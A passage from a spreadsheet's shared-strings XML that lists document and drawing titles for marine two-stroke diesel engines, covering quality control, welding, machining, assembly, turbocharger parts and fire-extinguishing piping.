    <t>EQUIPMENT F.HYDR.DAMPER</t>
  </si>
  <si>
    <t>PLATFORM ARRANGEMENT</t>
  </si>
  <si>
    <t>ASSY OF HOLDING DOWN BOLT</t>
  </si>
  <si>
    <t>PLACING OF MEASURING PINS</t>
  </si>
  <si>
    <t>ASSY OF END CHOCK BOLT</t>
  </si>
  <si>
    <t>SIDE CHOCK</t>
  </si>
  <si>
    <t>CLASS SPARE PARTS</t>
  </si>
  <si>
    <t>REPLACED</t>
  </si>
  <si>
    <t>PRODUCT SPECIFICATIONS</t>
  </si>
  <si>
    <t>PS FOR BEDPLATE</t>
  </si>
  <si>
    <t>PS FOR FRAME BOX</t>
  </si>
  <si>
    <t>PS FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>PS FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>INTELLIGENT ENGINE KF 137</t>
  </si>
  <si>
    <t>QC BEARING CLEAR. MC-S</t>
  </si>
  <si>
    <t>PR BEDPL.SUPP.CHOCKS,MC-S</t>
  </si>
  <si>
    <t>QC CRANKS.DEFLEKTION,MC-S</t>
  </si>
  <si>
    <t>PR ENGINE INSTALL., MC-S</t>
  </si>
  <si>
    <t>PS F.START.AIR DISTRIBUT.</t>
  </si>
  <si>
    <t>CASTING GUIDELINES</t>
  </si>
  <si>
    <t>QS GUIDE SHOE WHITEMETAL</t>
  </si>
  <si>
    <t>QS THRUST BEAR.WHITEMETAL</t>
  </si>
  <si>
    <t>CASTING INSTRUCT. IRON</t>
  </si>
  <si>
    <t>CASTING INSTRUCT. STEEL</t>
  </si>
  <si>
    <t>MELTING, OTHER MATR.</t>
  </si>
  <si>
    <t>HIGH FRICTION COATING</t>
  </si>
  <si>
    <t>QC THERMAL SPRAY BOND. T.</t>
  </si>
  <si>
    <t>PISTON SKIRT.W.MO.COATING</t>
  </si>
  <si>
    <t>RP BEDPL.THIN PLATE WELD</t>
  </si>
  <si>
    <t>RP HOT CORRODED CYL.COVER</t>
  </si>
  <si>
    <t>REPAIR OF CAST STEEL</t>
  </si>
  <si>
    <t>REPAIR OF OTHER MATR.</t>
  </si>
  <si>
    <t>REPAIR OF EXH.V.SPINDLE</t>
  </si>
  <si>
    <t>REP.CON.ROD FORGED STEEL</t>
  </si>
  <si>
    <t>GEN.INSPECT.OF PLATES</t>
  </si>
  <si>
    <t>WELDING,TECH.REQUIREMENTS</t>
  </si>
  <si>
    <t>WELDING METHOD</t>
  </si>
  <si>
    <t>WELDING MATR.(ELECTRODES)</t>
  </si>
  <si>
    <t>WELDING INSTR. CYL.COVER</t>
  </si>
  <si>
    <t>WELDING INSTR. CRANKSHAFT</t>
  </si>
  <si>
    <t>WELDING INSTRUCT.BEDPLATE</t>
  </si>
  <si>
    <t>WELD.INSTR.FOR EXH.VALVE</t>
  </si>
  <si>
    <t>EXHAUST SPINDLE HVOF-COAT</t>
  </si>
  <si>
    <t>WELDING INSTRUCT. FRAME</t>
  </si>
  <si>
    <t>WELDING INST.F.STAY BOLT</t>
  </si>
  <si>
    <t>WELD.OF FUEL OIL H.P.PIPE</t>
  </si>
  <si>
    <t>WELDING FIXTURE</t>
  </si>
  <si>
    <t>WELD.INSTR.F.COOLING SYST</t>
  </si>
  <si>
    <t>QS HYDR.EXH.ACTUATOR</t>
  </si>
  <si>
    <t>QC ACCUM. BLOCK NODULAR</t>
  </si>
  <si>
    <t>PS HEAT TREAT.WELDED COMP</t>
  </si>
  <si>
    <t>DIM. GUIDANCE F.MACHINING</t>
  </si>
  <si>
    <t>MI FOR BEDPLATE</t>
  </si>
  <si>
    <t>MI FOR FRAME BOX</t>
  </si>
  <si>
    <t>MI F.CHAIN DRIVE UPP.PART</t>
  </si>
  <si>
    <t>MI FOR CYLINDER FRAME</t>
  </si>
  <si>
    <t>MI FOR CYLINDER COVER</t>
  </si>
  <si>
    <t>MI FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>MI FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>MACHINING INSTRUC.,REG 09</t>
  </si>
  <si>
    <t>MI FOR PISTON</t>
  </si>
  <si>
    <t>MI FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>MI FOR CROSSHEAD</t>
  </si>
  <si>
    <t>MI FOR FUEL VALVE</t>
  </si>
  <si>
    <t>MI FOR STAYBOLT</t>
  </si>
  <si>
    <t>MI FOR CAMSHAFT</t>
  </si>
  <si>
    <t>MI FOR FUEL PUMP GEAR</t>
  </si>
  <si>
    <t>MI FOR REVERSING MECHA.</t>
  </si>
  <si>
    <t>MACHINING INSTRUC.,REG 33</t>
  </si>
  <si>
    <t>MI FOR FUEL PUMP</t>
  </si>
  <si>
    <t>MI FOR TURNING WHEEL</t>
  </si>
  <si>
    <t>MI FOR THRUST BEARING</t>
  </si>
  <si>
    <t>MI FOR L-MC</t>
  </si>
  <si>
    <t>VARIOUS INSTRUCTIONS</t>
  </si>
  <si>
    <t>BEDPLATE CHECK + MARKING</t>
  </si>
  <si>
    <t>FRAMEBOXCHECK + MARKING</t>
  </si>
  <si>
    <t>CHAINFRAME CHECK+MARKING</t>
  </si>
  <si>
    <t>CYL.FRAME CHECK + MARKING</t>
  </si>
  <si>
    <t>MARKING INSTRUCTION</t>
  </si>
  <si>
    <t>MARKING OF ENGINE PARTS</t>
  </si>
  <si>
    <t>MARKING, LIFTING TOOL SWL</t>
  </si>
  <si>
    <t>CONN.ROD LINERS OF BRONZE</t>
  </si>
  <si>
    <t>QC AUXILIARY BLOWER</t>
  </si>
  <si>
    <t>QC SCAVENGE AIR RECEIVER</t>
  </si>
  <si>
    <t>SCAVAIR REC.CHECK+MARKING</t>
  </si>
  <si>
    <t>EXHAUST REC.CHECK+MARKING</t>
  </si>
  <si>
    <t>DIM.+MASSES OF MAIN COMP.</t>
  </si>
  <si>
    <t>CH. AIR COOLER</t>
  </si>
  <si>
    <t>SA BASEPLATE, R.G.HOUSING</t>
  </si>
  <si>
    <t>SA FOR CAMSHAFT</t>
  </si>
  <si>
    <t>MOUNT BASEPLATE COMPLETE</t>
  </si>
  <si>
    <t>SA FOR CHAIN DRIVE</t>
  </si>
  <si>
    <t>SUB-ASSEMBLING, REG. 33</t>
  </si>
  <si>
    <t>PR START. AIR DISTRIBUTOR</t>
  </si>
  <si>
    <t>QC WELD.CODE+ABBREVIATION</t>
  </si>
  <si>
    <t>SA FOR MOMENT COMPENSATOR</t>
  </si>
  <si>
    <t>SA FOR EXHAUST RECIVER</t>
  </si>
  <si>
    <t>QUAL.CONTR./SCHEMES/INSP.</t>
  </si>
  <si>
    <t>QC FOR BEDPLATE</t>
  </si>
  <si>
    <t>QC FOR FRAME BOX</t>
  </si>
  <si>
    <t>QC F.CHAIN DRIVE UPP.PART</t>
  </si>
  <si>
    <t>QC TIGHTN.BOLTED JOINTS</t>
  </si>
  <si>
    <t>QC FOR CYLINDER FRAME</t>
  </si>
  <si>
    <t>QC FOR CYLINDER COVER</t>
  </si>
  <si>
    <t>QC FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>QC FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>QC FOR PISTON</t>
  </si>
  <si>
    <t>QC FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>PR FUEL VALVE, SLIDE TYPE</t>
  </si>
  <si>
    <t>QC FOR FUEL VALVE</t>
  </si>
  <si>
    <t>PS FUEL NOZZLE,HEATTREATM</t>
  </si>
  <si>
    <t>CRANKSHAFT ACC.CRITERIA</t>
  </si>
  <si>
    <t>RECIP.PARTS MEASUR.SHEET</t>
  </si>
  <si>
    <t>RECIP.PARTS OPERA.DESC.</t>
  </si>
  <si>
    <t>QC. CYL.COVER FIRST TIME</t>
  </si>
  <si>
    <t>RECIP.PARTS,INSP.ON BOARD</t>
  </si>
  <si>
    <t>QC CHAIN WHEEL RUNNING IN</t>
  </si>
  <si>
    <t>QC CAMSHAFT CHAINS</t>
  </si>
  <si>
    <t>QC  SCHEMES/INSPECTION</t>
  </si>
  <si>
    <t>QS GENERATOR SHAFT PTO</t>
  </si>
  <si>
    <t>STD.TENSILE SPECIM.STEEL</t>
  </si>
  <si>
    <t>MC MAIN ASSEMBLY</t>
  </si>
  <si>
    <t>ALIGN+ASSEMBLE BEDPLATE</t>
  </si>
  <si>
    <t>ALIGNMENT, FREE SPACE FOR</t>
  </si>
  <si>
    <t>ADAPT BEARINGS+CRANKSHAFT</t>
  </si>
  <si>
    <t>PR BEARING LOAD MEASURING</t>
  </si>
  <si>
    <t>MOUNT THRUSTSHAFT+TURNWH.</t>
  </si>
  <si>
    <t>CABLE DRUM FOR PIANO WIRE</t>
  </si>
  <si>
    <t>PR BEARING LOAD MEAS.MC-S</t>
  </si>
  <si>
    <t>THRUST BEARING ADAPTATION</t>
  </si>
  <si>
    <t>ALIGN BEDPL.,COMM.VESSELS</t>
  </si>
  <si>
    <t>ALIGN FRAME GIRDERS+BOXES</t>
  </si>
  <si>
    <t>REAMING BEDPLATE+FRAMEBOX</t>
  </si>
  <si>
    <t>MOUNT COVERS+VALVES,F.BOX</t>
  </si>
  <si>
    <t>MOUNT CRANK BEAR+CONN.ROD</t>
  </si>
  <si>
    <t>MOUNT THRUST BEARING</t>
  </si>
  <si>
    <t>MOUNT SHORT STAY BOLTS</t>
  </si>
  <si>
    <t>SCAV.AIR PIPE ASS.+MOUNT</t>
  </si>
  <si>
    <t>PR ALIGN CAMSHAFT PARTS</t>
  </si>
  <si>
    <t>ASS.+MOUNT+ALIGN PISTONS</t>
  </si>
  <si>
    <t>ALIGN ROLLERGUIDE HOUSING</t>
  </si>
  <si>
    <t>MOUNT CHAIN+ADJ.CAMSHAFT</t>
  </si>
  <si>
    <t>MOUNT PISTON COOL.+OUTLET</t>
  </si>
  <si>
    <t>MOUNT CYL.COV.+EXH.PIPES</t>
  </si>
  <si>
    <t>MOUNT VALVEGEAR+FUEL PUMP</t>
  </si>
  <si>
    <t>MOUNT.OF REGULATING SHAFT</t>
  </si>
  <si>
    <t>MOUNT.OF ANGLE ENCODER</t>
  </si>
  <si>
    <t>QC TEST MANOEUVRE SYSTEM</t>
  </si>
  <si>
    <t>PR ALPHA CYL. LUBRICATION</t>
  </si>
  <si>
    <t>MOUNT CYL.LUBR.+GOVERNOR</t>
  </si>
  <si>
    <t>ALIGN+MOUNT CYL.FRAMES</t>
  </si>
  <si>
    <t>ASSEMBLING OF CYL.FRAMES</t>
  </si>
  <si>
    <t>QC EL. LUBRICATOR</t>
  </si>
  <si>
    <t>MOUNT SCAV.AIR RECEIVER</t>
  </si>
  <si>
    <t>MOUNT MANOEUVRING GEAR</t>
  </si>
  <si>
    <t>RE-ALIGNM. OF GUIDE BARS</t>
  </si>
  <si>
    <t>MOUNT.,MOMENT COMP 4-ORD.</t>
  </si>
  <si>
    <t>MOUNT.OF MOMENT COMP.</t>
  </si>
  <si>
    <t>MOUNT GUIDEWAYS, UPPER</t>
  </si>
  <si>
    <t>MOUNT WATERCON.+EXH.VALVE</t>
  </si>
  <si>
    <t>MOUNT VAR.THERMOMETER PCS</t>
  </si>
  <si>
    <t>DISMANTLING</t>
  </si>
  <si>
    <t>MOUNT CENTRE GALLERY, MAN</t>
  </si>
  <si>
    <t>MOUNT UPPER GALLERY, MAN</t>
  </si>
  <si>
    <t>MOUNT UP.GALLERY, EXH.S.</t>
  </si>
  <si>
    <t>MOUNT.OF POWER TAKE OFF</t>
  </si>
  <si>
    <t>CHECK CLEARANCE AFT.TEST</t>
  </si>
  <si>
    <t>CHECK OF CAMS ON CAMSHAFT</t>
  </si>
  <si>
    <t>RECOMMENDATION</t>
  </si>
  <si>
    <t>SEALING DURING ASSEMBLY</t>
  </si>
  <si>
    <t>PAINT</t>
  </si>
  <si>
    <t>LUB.OF BEARING B.SEATRIAL</t>
  </si>
  <si>
    <t>MC PROD.REC,INSTAL.OF ENG</t>
  </si>
  <si>
    <t>QS HARDNESS MES.EQUIPMENT</t>
  </si>
  <si>
    <t>ALIGNMENT TOOLS (ASSY)</t>
  </si>
  <si>
    <t>PR LASER&amp;PIANOWIRE ALIGN</t>
  </si>
  <si>
    <t>PS FUEL PUMP H.PRESS TEST</t>
  </si>
  <si>
    <t>PR SAFETY CHECK O.TESTBED</t>
  </si>
  <si>
    <t>INSTALL. 2-STROKE MARINE</t>
  </si>
  <si>
    <t>DISPATCH PATTERN SPECIAL</t>
  </si>
  <si>
    <t>DISPATCH PATTERN TC AFT.</t>
  </si>
  <si>
    <t>PRESERVATION INSTRUCTIONS</t>
  </si>
  <si>
    <t>SEATING FOR AC/WMC</t>
  </si>
  <si>
    <t>INLET CONE</t>
  </si>
  <si>
    <t>AIR FLOW STRAIGHTENER</t>
  </si>
  <si>
    <t>JET ASSISTANCE ARRANGEM.</t>
  </si>
  <si>
    <t>THRUST+JOURNAL BEARING</t>
  </si>
  <si>
    <t>TURBOCHARGER, SPARE PARTS</t>
  </si>
  <si>
    <t>TURBOCHARGER WITH PIPE</t>
  </si>
  <si>
    <t>ROTOR SHAFT-PREROTOR</t>
  </si>
  <si>
    <t>ROTOR EXL.INDUCER,IMPELL.</t>
  </si>
  <si>
    <t>ROTOR COMPL.W.PREROTOR</t>
  </si>
  <si>
    <t>ROTOR SHAFT</t>
  </si>
  <si>
    <t>SHAFT-COMPRESSOR WHEEL</t>
  </si>
  <si>
    <t>SHAFT TURBINE END</t>
  </si>
  <si>
    <t>LAB.SEAL TURB.END</t>
  </si>
  <si>
    <t>BALANCING RING</t>
  </si>
  <si>
    <t>PRE-ROTOR WITH RING</t>
  </si>
  <si>
    <t>PRE-ROTOR-MARKED</t>
  </si>
  <si>
    <t>DIFFUSOR-MARKED</t>
  </si>
  <si>
    <t>PARTS FOR NOZZLE ASSEMBLY</t>
  </si>
  <si>
    <t>COVER (TURBOCHARGER)</t>
  </si>
  <si>
    <t>AIR MEASURING</t>
  </si>
  <si>
    <t>COMPRESSOR CASING</t>
  </si>
  <si>
    <t>ZINC BLOCK</t>
  </si>
  <si>
    <t>OIL PUMP</t>
  </si>
  <si>
    <t>BALL BEARING ARR.</t>
  </si>
  <si>
    <t>THRUST BEARING COMPLETE</t>
  </si>
  <si>
    <t>BEARING HOUSING COMPLETE</t>
  </si>
  <si>
    <t>THRUST BEARING SEGMENT-A</t>
  </si>
  <si>
    <t>THRUST BEARING SEGMENT-B</t>
  </si>
  <si>
    <t>SILENCER COMPLETE</t>
  </si>
  <si>
    <t>GUARD-INSIDE</t>
  </si>
  <si>
    <t>GUARD-OUTSIDE</t>
  </si>
  <si>
    <t>GUARD WITH CLEANING UNIT</t>
  </si>
  <si>
    <t>AIR FILTER BOX</t>
  </si>
  <si>
    <t>FELT GUARDS COMPLETE</t>
  </si>
  <si>
    <t>FELT GUARD</t>
  </si>
  <si>
    <t>SUPPORTING STRIP-RUBBER</t>
  </si>
  <si>
    <t>CLAMP WITH SEALING STRIP</t>
  </si>
  <si>
    <t>SUPPORT PIPE</t>
  </si>
  <si>
    <t>PIPES FOR SEALING AIR</t>
  </si>
  <si>
    <t>OIL TANK</t>
  </si>
  <si>
    <t>DETENT WITH HUB</t>
  </si>
  <si>
    <t>LIQUID INDICATOR</t>
  </si>
  <si>
    <t>ARR. OF AIR COOLER</t>
  </si>
  <si>
    <t>COOLER BOX + PIPES, REAR</t>
  </si>
  <si>
    <t>VALVE F.WATER WASHING ARR</t>
  </si>
  <si>
    <t>DRAWINGS SUMMARY</t>
  </si>
  <si>
    <t>LAYOUT OF COOLER</t>
  </si>
  <si>
    <t>COOLER BLOCK</t>
  </si>
  <si>
    <t>ASSEMBLY DRAWING LKV-LKW</t>
  </si>
  <si>
    <t>ASSEMBLY DRAWING LLK</t>
  </si>
  <si>
    <t>ASSEMBLY DRAWING SLK</t>
  </si>
  <si>
    <t>INSTALL.,CHNGD AIR COOLER</t>
  </si>
  <si>
    <t>AIR COOL.HOUSING LKV-LKW</t>
  </si>
  <si>
    <t>AIR COOL.HOUSING LLK</t>
  </si>
  <si>
    <t>AIR COOL.HOUSING SLK</t>
  </si>
  <si>
    <t>AIR COOL.HOUSING BLK</t>
  </si>
  <si>
    <t>AIR COOL.HOUSING LKS</t>
  </si>
  <si>
    <t>AIR COOL HOUSING</t>
  </si>
  <si>
    <t>AIR COOL.HOUSING-MACHIN.</t>
  </si>
  <si>
    <t>AIR COOL.HOUSING-WELDING</t>
  </si>
  <si>
    <t>INSERT KLK COOLER</t>
  </si>
  <si>
    <t>ATT. OF INTERCOOLER</t>
  </si>
  <si>
    <t>COOLER INSERT</t>
  </si>
  <si>
    <t>LIFTING EQUIPMENT</t>
  </si>
  <si>
    <t>CROSSMEMBER FOR INSERT</t>
  </si>
  <si>
    <t>TUBE PLATE FOR END COVER</t>
  </si>
  <si>
    <t>TUBE PLATE-AIR REV.CHAMB</t>
  </si>
  <si>
    <t>SCREWS FOR MOUNT. OF A.C.</t>
  </si>
  <si>
    <t>COOL.ELEM.-STRAIGHT TUBES</t>
  </si>
  <si>
    <t>TOOLS-TURBOCHARGER</t>
  </si>
  <si>
    <t>BRACKET WITH ROLLER GUIDE</t>
  </si>
  <si>
    <t>BRACKET FOR ROLLER GUIDE</t>
  </si>
  <si>
    <t>SUPPORT FOR BRACKET</t>
  </si>
  <si>
    <t>LIFTING TOOL FOR ROTOR</t>
  </si>
  <si>
    <t>EXTENSION PIPE</t>
  </si>
  <si>
    <t>PUSHING TOOL FOR COOLER</t>
  </si>
  <si>
    <t>CLAMPING TOOL FOR COOLER</t>
  </si>
  <si>
    <t>PULLER F.TURBOCHARG.PARTS</t>
  </si>
  <si>
    <t>CROSSMEMBER</t>
  </si>
  <si>
    <t>ASSEMBLY PIECE</t>
  </si>
  <si>
    <t>LOCK FOR ROTOR</t>
  </si>
  <si>
    <t>END STOP PLATE</t>
  </si>
  <si>
    <t>EYE NUT FOR TURBO ROTOR</t>
  </si>
  <si>
    <t>SUNDRY</t>
  </si>
  <si>
    <t>DRY CLEANING TANK</t>
  </si>
  <si>
    <t>CLEANING PIPE STEAM-AIR</t>
  </si>
  <si>
    <t>TOOLS-COOLER INSERT</t>
  </si>
  <si>
    <t>QC TIGHTENING MINOR BOLT</t>
  </si>
  <si>
    <t>PS RELIEF VALVE FUNC.TEST</t>
  </si>
  <si>
    <t>QS RELIEF VALVE CRANKCASE</t>
  </si>
  <si>
    <t>QS FRAME BOX</t>
  </si>
  <si>
    <t>QC MAKERS LIST</t>
  </si>
  <si>
    <t>QC TIGHTEN.MAIN BRG.STUDS</t>
  </si>
  <si>
    <t>QC DEFECTREPAIR CASTSTEEL</t>
  </si>
  <si>
    <t>QC UST INSPEC. OF PLATES</t>
  </si>
  <si>
    <t>WET MAGN.PARTICLE INSPEC.</t>
  </si>
  <si>
    <t>QC CAST IRON TEST SAMPLE</t>
  </si>
  <si>
    <t>QC GRINDM. EXHAUST VALVE</t>
  </si>
  <si>
    <t>QS GRINDM. EXHAUST VALVE</t>
  </si>
  <si>
    <t>QS DISTRBUTOR BLOCK,HYDR.</t>
  </si>
  <si>
    <t>PR HP DOUBLE PIPE TEST</t>
  </si>
  <si>
    <t>PR HP FUEL OIL PIPES</t>
  </si>
  <si>
    <t>QC HP FUEL OIL PIPES</t>
  </si>
  <si>
    <t>QC WELD.AREAS BY ETCHING</t>
  </si>
  <si>
    <t>PS MAIN BEARING SUPPORT</t>
  </si>
  <si>
    <t>QS MAIN BEAR.CAP NODULAR</t>
  </si>
  <si>
    <t>QC CAST STEEL BRG.SUPPORT</t>
  </si>
  <si>
    <t>QC CAST CYL.COVERS</t>
  </si>
  <si>
    <t>QC CAST PIST.CROWNS W.RIB</t>
  </si>
  <si>
    <t>QS PISTON RINGS</t>
  </si>
  <si>
    <t>QC PISTON RING ALU.BRONCE</t>
  </si>
  <si>
    <t>QC PISTON RING RUN-IN-LAY</t>
  </si>
  <si>
    <t>QC WELD.COOL.EXHV.BOTTOMP</t>
  </si>
  <si>
    <t>QC WELDED PISTON CROWNS</t>
  </si>
  <si>
    <t>QC FORGED CYLINDER COVER</t>
  </si>
  <si>
    <t>QS FORGED GEAR WHEEL</t>
  </si>
  <si>
    <t>QC CYL.COVER  RECON. WELD</t>
  </si>
  <si>
    <t>QC REV.LINK FIRST TIME</t>
  </si>
  <si>
    <t>QS CYL.COVER INCONEL 625</t>
  </si>
  <si>
    <t>QS CAST CRANK THROW</t>
  </si>
  <si>
    <t>QS EXH.BOT.PIECE I.HARDN.</t>
  </si>
  <si>
    <t>QS FORGED CRANK THROW</t>
  </si>
  <si>
    <t>QS ACCUM. BLOCK FORGED</t>
  </si>
  <si>
    <t>QS CRANKSHAFT &amp; FLANGE</t>
  </si>
  <si>
    <t>QC WHITEMETAL IN MAINBEAR</t>
  </si>
  <si>
    <t>QC BEARING ALUMIN. ALLOY</t>
  </si>
  <si>
    <t>PR EXH. SPINDLE ROLLING</t>
  </si>
  <si>
    <t>PR CYL.LINER ROLLING</t>
  </si>
  <si>
    <t>PR CYL.LINER, LUB BORE</t>
  </si>
  <si>
    <t>PR INSTAL.HOF FITTED BOLT</t>
  </si>
  <si>
    <t>PS SURFACE HARDENING</t>
  </si>
  <si>
    <t>PR MANGANESE PHOSPHATING</t>
  </si>
  <si>
    <t>PIPES CLEAN. &amp; TREATMENT</t>
  </si>
  <si>
    <t>PR POST WELD TREATMENT</t>
  </si>
  <si>
    <t>QC HARDEN. P.RING GROOVE</t>
  </si>
  <si>
    <t>PS CON.ROD THRUST PIECE</t>
  </si>
  <si>
    <t>QC FUEL VALVE BORE RECON.</t>
  </si>
  <si>
    <t>PROD.SPEC.HARDFACING EXHV</t>
  </si>
  <si>
    <t>PS WELD.SPEC.COOL.BOTTOMP</t>
  </si>
  <si>
    <t>PS PISTON CROWN WELDED</t>
  </si>
  <si>
    <t>FRAMEBOX WELDING F+P TOL.</t>
  </si>
  <si>
    <t>PR SHRINKAGE BY WELDING</t>
  </si>
  <si>
    <t>QI-S REVERSING LINK</t>
  </si>
  <si>
    <t>ADM. SPECIFICATION</t>
  </si>
  <si>
    <t>PR PIPES CLEAN. + TREATM.</t>
  </si>
  <si>
    <t>PR HYDRAULIC OIL SAMPLING</t>
  </si>
  <si>
    <t>PR DEBURRING + CLEANING</t>
  </si>
  <si>
    <t>PR MOUNTING,GEARBOX COMP.</t>
  </si>
  <si>
    <t>PR MOUNT. TRIGGER RING</t>
  </si>
  <si>
    <t>PR FUEL PUMP COVER P.TEST</t>
  </si>
  <si>
    <t>QC FUEL PLUNGER &amp; BARREL</t>
  </si>
  <si>
    <t>PR PROTEC. ELECTRONIC</t>
  </si>
  <si>
    <t>PR ASS. OF FUEL PUMP</t>
  </si>
  <si>
    <t>QS HYDRAULIC PUMP UNIT</t>
  </si>
  <si>
    <t>QS FUEL VALVE TEST DEVICE</t>
  </si>
  <si>
    <t>QC TEST F.TIME CAST CYL.L</t>
  </si>
  <si>
    <t>PIPE CONNECTIONS AFT.END</t>
  </si>
  <si>
    <t>FOUNDATION DRAWING</t>
  </si>
  <si>
    <t>ENGINE FOUNDATION</t>
  </si>
  <si>
    <t>SHOP TRIAL,SITE TRIAL,MCS</t>
  </si>
  <si>
    <t>SITE TRIAL,          MC-S</t>
  </si>
  <si>
    <t>ARR. OF PRESSURE HOSE</t>
  </si>
  <si>
    <t>FUNDAMENT FOR PUMP</t>
  </si>
  <si>
    <t>MOUNT. OF AUX. BLOWER</t>
  </si>
  <si>
    <t>AUX. EQUIPMENT COMPL.</t>
  </si>
  <si>
    <t>STARTING AIR DISTRIBUTOR</t>
  </si>
  <si>
    <t>ST. AIR DISTRIB. DRIVE</t>
  </si>
  <si>
    <t>ST. AIR DISTRIB. MOUNTING</t>
  </si>
  <si>
    <t>ST.AIR DISTRIB-PARTS LIST</t>
  </si>
  <si>
    <t>STARTING AIR DISTR.MOUNT.</t>
  </si>
  <si>
    <t>FIRE DETECTION,SCAV. BOX</t>
  </si>
  <si>
    <t>CO2 EXTING.IN SCAV.BOX</t>
  </si>
  <si>
    <t>STEAM EXTING.IN SCAV.BOX</t>
  </si>
  <si>
    <t>HALON EXTING. IN SCAV.BOX</t>
  </si>
  <si>
    <t>FIRE EXTING. IN SCAV. BOX</t>
  </si>
  <si>
    <t>WATER EXTING.IN SCAV.BOX</t>
  </si>
  <si>
    <t>DEW POINT ALARM</t>
  </si>
  <si>
    <t>MAIN PIPE EXTINGUISHING</t>
  </si>
  <si>
    <t>EXTINGUISHING PIPE</t>
  </si>
  <si>
    <t>ALARM, TANK DEW POINT</t>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-CO2</t>
  </si>
  <si>
    <t>MAIN PIPE-STEAM EXTING.</t>
  </si>
  <si>
    <t>MAIN PIPE,FIRE EXTING</t>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-STEAM</t>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-DRAIN</t>
  </si>
  <si>
    <t>MAIN PIPE, W.MIST EXTING.</t>
  </si>
  <si>
    <t>EXTINGUISHING PIPE-WATER</t>
  </si>
  <si>
    <t>SPRINKLER</t>
  </si>
  <si>
    <t>ALTERATION OF AIR COOLER</t>
  </si>
  <si>
    <t>MAIN PIPE-CLEANING</t>
  </si>
  <si>
    <t>CONST. PRESS ARRANGEMENT</t>
  </si>
  <si>
    <t>EXCHANGE OF TURBOCHARGER</t>
  </si>
  <si>
    <t>DIAPHRAGM-ARR.</t>
  </si>
  <si>
    <t>FUEL OIL PIPES,INSULATION</t>
  </si>
  <si>
    <t>HEATING OF FUEL OIL PIPES</t>
  </si>
  <si>
    <t>HEATING F.O.DRAINPIPES</t>
  </si>
  <si>
    <t>LIST OF FIRE-EXTINGUISH</t>
  </si>
  <si>
    <t>CONNECTION EL.COMPONENTS</t>
  </si>
  <si>
    <t>LIST OF BUTTERFLY VALVES</t>
  </si>
  <si>
    <t>VARIOUS ALTERATIONS-PIPES</t>
  </si>
  <si>
    <t>GEN.WELD.SYMBOLS F.PIPES</t>
  </si>
  <si>
    <t>LIST OF PACKINGS</t>
  </si>
  <si>
    <t>COCK WITH STRAIGHT PLUG</t>
  </si>
  <si>
    <t>EXTERNAL PIPES ENG. ROOM</t>
  </si>
  <si>
    <t>ARR. OF SOLENOID VALVE</t>
  </si>
  <si>
    <t>BRACKET F.JET-ASSIST PIPE</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-Y56F</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K67GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L90GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L80GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K98FF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K62+62VT2</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K42+42VT2</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L45GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L90MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L80MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L70MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L60MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L50MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-S60MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K80MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K90MC-2</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K80MC-C</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-S50MC</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-S90MC-T</t>
  </si>
  <si>
    <t>CLEARANCE</t>
  </si>
  <si>
    <t>IMO TECHNICAL FILE</t>
  </si>
  <si>
    <t>APPENDIX A;IMO TECHN.FILE</t>
  </si>
  <si>
    <t>APPENDIX B;IMO TECHN.FILE</t>
  </si>
  <si>
    <t>IACS UR M44 DOCUMENTS</t>
  </si>
  <si>
    <t>IMO SUPPORTIVE DOCUMENT.</t>
  </si>
  <si>
    <t>USER MANUAL IMO TECH.FILE</t>
  </si>
  <si>
    <t>POINTS FOR STRAIN GAUGE</t>
  </si>
  <si>
    <t>PLANT SPEC. REMARKS</t>
  </si>
  <si>
    <t>SURVEY OF MATERIALS</t>
  </si>
  <si>
    <t>LIST OF CAPACITIES</t>
  </si>
  <si>
    <t>EXH.TEMP.AND GAS AMOUNT</t>
  </si>
  <si>
    <t>CAPACITIES,MAIN &amp; AUX ENG</t>
  </si>
  <si>
    <t>TURNING GEAR CONTROL SYST</t>
  </si>
  <si>
    <t>HEAT BALANCE</t>
  </si>
  <si>
    <t>SHOP TRIAL, RUNNING-IN</t>
  </si>
  <si>
    <t>SHOP TRIAL, DELIVERY TEST</t>
  </si>
  <si>
    <t>QUAY &amp; SEA TRIAL CHECKS</t>
  </si>
  <si>
    <t>SUOND MEASUREMENT CURVES</t>
  </si>
  <si>
    <t>WATER AND OIL IN ENGINE</t>
  </si>
  <si>
    <t>GUIDE FORCE MOMENTS</t>
  </si>
  <si>
    <t>EXT.FORCES &amp;MOM.,DESCRIPT</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-S50L</t>
  </si>
  <si>
    <t>CYLINDER SECTION</t>
  </si>
  <si>
    <t>HIGH PRESS.INJECT.EQUIPM.</t>
  </si>
  <si>
    <t>POWER REDUCTION DIAGRAM</t>
  </si>
  <si>
    <t>BOLT DIAGRAM</t>
  </si>
  <si>
    <t>CENTRE OF GRAVITY  S35P</t>
  </si>
  <si>
    <t>CENTRE OF GRAVITY  U35P</t>
  </si>
  <si>
    <t>SFOC CURVE</t>
  </si>
  <si>
    <t>TUFFTRIDE PROCESS</t>
  </si>
  <si>
    <t>GAS SYSTEM</t>
  </si>
  <si>
